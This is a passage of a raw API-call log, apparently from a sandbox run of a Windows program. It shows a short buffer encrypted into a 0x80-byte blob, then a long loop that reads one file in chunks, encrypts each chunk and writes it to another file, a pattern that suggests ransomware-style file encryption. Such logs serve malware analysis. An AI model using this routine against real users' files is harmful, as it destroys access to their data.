dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0272.703] CryptEncrypt (in: hKey=0x2fad88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f28078*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f28078*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0272.703] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f28078*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f28078*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0272.705] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.741] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.742] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.767] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.768] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.768] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.769] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.769] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.769] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.769] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.769] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.769] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.769] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.769] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.769] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.769] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.770] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.770] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.770] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.770] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.770] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.770] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.770] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.770] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.770] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.770] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.770] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.770] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.770] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.770] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.771] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.771] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.771] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.771] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.771] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.771] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.771] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.771] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.771] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.771] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.771] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.771] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.772] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.772] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.772] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.772] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.772] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.772] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.772] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.772] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.772] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.772] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.772] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.772] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.772] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.772] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.772] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.773] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.773] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.773] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.773] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.773] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.773] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.773] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.773] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.773] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.773] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.773] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.773] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.774] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.774] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.774] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.774] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.774] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.774] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.774] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.774] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.774] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.774] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.775] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.775] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.775] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.775] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.775] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.775] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.775] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.775] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.775] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.775] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.775] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.776] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.776] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.776] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.776] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.776] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.776] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.776] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.776] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.776] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.776] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.777] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 